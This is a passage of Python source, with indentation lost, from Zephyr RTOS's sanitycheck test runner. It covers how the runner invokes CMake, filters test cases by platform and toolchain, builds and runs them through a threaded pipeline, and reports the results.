aflags = "-Wa,--fatal-warnings"
else:
ldflags = cflags = aflags = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
self.suite.total_skipped_cases += 1
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.status}")
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_to_do))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
self.suite.total_errors += 1
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
self.suite.total_passed += 1
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_to_do,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_to_do) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan or self.ubsan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_skipped_cases = 0 # number of skipped test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
# run integration tests only
self.integration = False
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_to_do = self.total_tests - self.total_skipped
self.total_cases = 0
for instance in self.instances:
self.total_cases += len(self.instances[instance].testcase.cases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_passed) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_passed,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases - self.total_skipped_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run - self.total_skipped}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = discards.get(instance, "Not in test case arch whitelist")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = discards.get(instance, "Not in testcase platform whitelist")
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = discards.get(instance, "Not in testcase toolchain whitelist")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = discards.get(instance, "Not a default test platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
instance.status = "skipped"
instance.fill_results_by_status()
# We only count skipped tests for instances in self.instances
if self.instances.get(instance.name, False):
self.total_skipped += 1
self.total_skipped_cases += len(instance.testcase.cases)
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped', 'error']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception:' % (test,))
for line in traceback.format_exc().splitlines():
logger.error(line)
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
